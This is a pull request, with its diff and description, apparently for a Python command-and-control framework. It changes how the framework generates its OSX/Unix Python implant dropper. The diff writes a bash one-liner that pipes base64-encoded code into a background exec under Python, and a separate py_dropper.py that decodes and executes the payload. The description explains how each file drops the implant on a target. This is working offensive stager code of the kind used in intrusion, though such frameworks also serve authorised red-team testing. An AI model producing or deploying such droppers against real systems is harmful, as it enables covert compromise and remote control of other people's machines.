### PR TITLE
Upload-file path completion and and unix pwn-self

### DIFF
--- a/Payloads.py
+++ b/Payloads.py
@@ -418,15 +418,22 @@ ao.run('%s', 0);window.close();
 
   def CreatePython(self, name=""):
     self.QuickstartLog( ""+Colours.END )
-    self.QuickstartLog( "OSX Python Payload:"+Colours.GREEN )
+    self.QuickstartLog( "OSX/Unix Python Payload:"+Colours.GREEN )
     py = base64.b64encode(self.Python)
     #print self.Python
-    pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % py
+    pydropper_bash = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % py
+    filename = "%s%spy_dropper.sh" % (self.BaseDirectory,name)
+    output_file = open(filename, 'w')
+    output_file.write(pydropper_bash)
+    output_file.close()
+    self.QuickstartLog( pydropper_bash )
+
+    #print self.Python
+    pydropper_python = "import sys,base64;exec(base64.b64decode('%s'));" % py
     filename = "%s%spy_dropper.py" % (self.BaseDirectory,name)
     output_file = open(filename, 'w')
-    output_file.write(pydropper)
+    output_file.write(pydropper_python)
     output_file.close()
-    self.QuickstartLog( pydropper )
 
   def CreateEXE(self, name=""):
     with open("%s%sPosh-shellcode_x64.bin" % (self.BaseDirectory,name), 'rb') as f:


### PR DESCRIPTION
If the command is just `upload-file` use the `inject-shellcode` style path completion for uploading files.
The original command still exists, and is the only way to add the **nothidden** flag.

Also changed the pwn self command (`p`) to call the python dropper (as they have to have python installed to run posh...), however this didn't work as the **py_dropper.py** actually contains the shell command which pipes to python at the end, so this has been renamed to **py_dropper.sh** and **py_dropper.py** now just contains the python payload which can be executed as `python py_dropper.py &`. 

So `py_dropper.sh` or `python py_dropper.py` can be executed to drop a python payload, previously `python py_dropper.py` errored.